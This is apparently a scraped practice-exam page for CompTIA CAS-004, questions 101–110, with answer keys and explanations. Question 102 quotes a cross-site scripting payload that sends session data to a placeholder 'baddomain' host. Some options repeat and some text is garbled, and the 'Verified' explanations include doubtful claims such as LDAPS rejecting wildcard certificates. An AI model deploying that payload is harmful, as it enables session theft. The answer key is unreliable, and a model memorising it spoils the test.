ExamGecko
Login
Home / CompTIA / CAS-004 / List of questions
Ask Question

CompTIA CAS-004 Practice Test - Questions Answers, Page 11

Add to Whishlist

List of questions

Question 101

Report Export Collapse

A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Block is an except of output from the troubleshooting session:

CompTIA CAS-004 image Question 101 94069 10022024175034000000

Which of the following BEST explains why secure LDAP is not working? (Select TWO.)

The clients may not trust idapt by default.
The clients may not trust idapt by default.
The secure LDAP service is not started, so no connections can be made.
The secure LDAP service is not started, so no connections can be made.
Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
Secure LDAP should be running on UDP rather than TCP.
Secure LDAP should be running on UDP rather than TCP.
The company is using the wrong port. It should be using port 389 for secure LDAP.
The company is using the wrong port. It should be using port 389 for secure LDAP.
Secure LDAP does not support wildcard certificates.
Secure LDAP does not support wildcard certificates.
The clients may not trust Chicago by default.
The clients may not trust Chicago by default.
Suggested answer: A, F
Explanation:

The clients may not trust idapt by default because it is a self-signed certificate authority that is not in the trusted root store of the clients. Secure LDAP does not support wildcard certificates because they do not match the fully qualified domain name of the server. Verified

Reference: https://www.professormesser.com/security-plus/sy0-401/ldap-and-secure-ldap/ , https://www.comptia.org/training/books/casp-cas-004-study-guide

asked 02/10/2024
Chan Park
43 questions

Question 102

Report Export Collapse

A threat analyst notices the following URL while going through the HTTP logs.

http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src=”http://baddomain~~~/session;

Which of the following attack types is the threat analyst seeing?

SQL injection
SQL injection
CSRF
CSRF
Session hijacking
Session hijacking
XSS
XSS
Suggested answer: D
Explanation:

XSS stands for cross-site scripting, which is a type of attack that injects malicious code into a web page that is then executed by the browser of a victim. The URL in the question contains a script tag that tries to execute a JavaScript code from an external source, which is a sign of XSS. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://owasp.org/www-community/attacks/xss/

asked 02/10/2024
Jozsef Stelly
56 questions

Question 103

Report Export Collapse

The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?

Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier's rating. Report finding units that rely on the suppliers and the various risk teams.
Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier's rating. Report finding units that rely on the suppliers and the various risk teams.
Suggested answer: D
Explanation:

A governance program that rates suppliers based on their access to data, the type of data, and how they access the data is the best way to manage the risk of handling and security of customer data by third parties. This allows the company to assign key controls that are reviewed and managed based on the supplier's rating and report findings to the relevant units and risk teams. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/third-party-risk-management

asked 02/10/2024
Maryna Zarytska
38 questions

Question 104

Report Export Collapse

Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements

Company A-B SLA v2.docx
Company A-B SLA v2.docx
Company A OLA v1b.docx
Company A OLA v1b.docx
Company A MSA v3.docx
Company A MSA v3.docx
Company A MOU v1.docx
Company A MOU v1.docx
Company A-B NDA v03.docx
Company A-B NDA v03.docx
Suggested answer: C
Explanation:

A MSA stands for master service agreement, which is a document that covers the general terms and conditions of a contractual relationship between two parties. It usually includes payment terms, limitation of liability, intellectual property rights, dispute resolution, and other clauses that apply to all services provided by one party to another. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.upcounsel.com/master-service-agreement

asked 02/10/2024
Mark Green
55 questions

Question 105

Report Export Collapse

A company requires a task to be carried by more than one person concurrently. This is an example of:

separation of d duties.
separation of d duties.
dual control
dual control
least privilege
least privilege
job rotation
job rotation
Suggested answer: B
Explanation:

Dual control is a security principle that requires two or more authorized individuals to perform a task concurrently. This reduces the risk of fraud, error, or misuse of sensitive assets or information. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/using-dual-control-to-mitigate-risk

asked 02/10/2024
john wick
41 questions

Question 106

Report Export Collapse

A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?

Hybrid IaaS solution in a single-tenancy cloud
Hybrid IaaS solution in a single-tenancy cloud
Pass solution in a multinency cloud
Pass solution in a multinency cloud
SaaS solution in a community cloud
SaaS solution in a community cloud
Private SaaS solution in a single tenancy cloud.
Private SaaS solution in a single tenancy cloud.
Suggested answer: A
Explanation:

A hybrid IaaS solution in a single-tenancy cloud is the best option for the company to meet the computing demand while complying with healthcare standards for virtualization and cloud computing. A hybrid IaaS solution allows the company to use both on-premises and cloud-based resources to scale up its capacity and performance. A single-tenancy cloud ensures that the company's data and applications are isolated from other customers and have dedicated resources and security controls. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.hhs.gov/hipaa/for-professionals/special-topics/cloud-computing/index.html

asked 02/10/2024
thanh nguyen
46 questions

Question 107

Report Export Collapse

A developer implement the following code snippet.

CompTIA CAS-004 image Question 107 94075 10022024175034000000

Which of the following vulnerabilities does the code snippet resolve?

SQL inject
SQL inject
Buffer overflow
Buffer overflow
Missing session limit
Missing session limit
Information leakage
Information leakage
Suggested answer: A
Explanation:

SQL injection is a type of vulnerability that allows an attacker to execute malicious SQL commands on a database by inserting them into an input field. The code snippet resolves this vulnerability by using parameterized queries, which prevent the input from being interpreted as part of the SQL command. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://owasp.org/www-community/attacks/SQL_Injection

asked 02/10/2024
Vangelis Gouloutis
44 questions

Question 108

Report Export Collapse

A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.

CompTIA CAS-004 image Question 108 94076 10022024175034000000

Which of the following should the security analyst perform?

Contact the security department at the business partner and alert them to the email event.
Contact the security department at the business partner and alert them to the email event.
Block the IP address for the business partner at the perimeter firewall.
Block the IP address for the business partner at the perimeter firewall.
Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
Configure the email gateway to automatically quarantine all messages originating from the business partner.
Configure the email gateway to automatically quarantine all messages originating from the business partner.
Suggested answer: A
Explanation:

The best option for the security analyst to perform is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick the employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate actions to protect their systems and users. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://us-cert.cisa.gov/ncas/tips/ST04-014

asked 02/10/2024
Abdul Majid Pasha
48 questions

Question 109

Report Export Collapse

A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief information Security Officer (CISO) must brief board of directors on the potential security concerns related to this migration. The board is concerned about the following.

* Transactions being required by unauthorized individual

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attacker using email to distribute malware and ransom ware.

* Exfiltration of sensitivity company information.

The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?

Data loss prevention
Data loss prevention
Endpoint detection response
Endpoint detection response
SSL VPN
SSL VPN
Application whitelisting
Application whitelisting
Suggested answer: A
Explanation:

Data loss prevention (DLP) is the best option to resolve the board's concerns for this email migration. DLP is a set of tools and policies that aim to prevent unauthorized access, disclosure, or exfiltration of sensitive data. DLP can monitor, filter, encrypt, or block email messages based on predefined rules and criteria, such as content, sender, recipient, attachment, etc. DLP can help protect transactions, customer data, and company information from being compromised by malicious actors or accidental leaks. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.csoonline.com/article/3245746/what-is-dlp-data-loss-prevention-and-how-does-it-work.html

asked 02/10/2024
Adilet Abdikhamit
39 questions

Question 110

Report Export Collapse

Which of the following BEST sets expectation between the security team and business units within an organization?

Risk assessment
Risk assessment
Memorandum of understanding
Memorandum of understanding
Business impact analysis
Business impact analysis
Business partnership agreement
Business partnership agreement
Services level agreement
Services level agreement
Suggested answer: E
Explanation:

A service level agreement (SLA) is the best option to set expectations between the security team and business units within an organization. An SLA is a document that defines the scope, quality, roles, responsibilities, and metrics of a service provided by one party to another. An SLA can help align the security team's objectives and activities with the business units' needs and expectations, as well as establish accountability and communication channels. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://searchitchannel.techtarget.com/definition/service-level-agreement

asked 02/10/2024
Alberto Paniagua
36 questions
Total 578 questions
Go to page: of 58
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?
An internal security assessor identified large gaps in a company's IT asset inventory system during a monthly asset review. The assessor is aware of an external audit that is underway. In an effort to avoid external findings, the assessor chooses not to report the gaps in the inventory system. Which of the following legal considerations is the assessor directly violating?
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity Internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but Is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?
An organization is designing a network architecture that must meet the following requirements: Users will only be able to access predefined services. Each user will have a unique allow list defined for access. The system will construct one-to-one subject/object access paths dynamically. Which of the following architectural designs should the organization use to meet these requirements?
An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following: ERR_SSL_VERSION_OR_CIPHER_MISMATCH Which of the following is MOST likely the root cause?
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive. Based on the output above, from which of the following process IDs can the analyst begin an investigation?
An loT device implements an encryption module built within its SoC where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware Which of the following should the loT manufacture do if the private key is compromised?
Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?
A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis. A security engineer is concerned about the security of the solution and notes the following. * The critical devise send cleartext logs to the aggregator. * The log aggregator utilize full disk encryption. * The log aggregator sends to the analysis server via port 80. * MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely. * The data is compressed and encrypted prior to being achieved in the cloud. Which of the following should be the engineer's GREATEST concern?
Law enforcement officials informed an organization that an investigation has begun. Which of the following is the FIRST step the organization should take?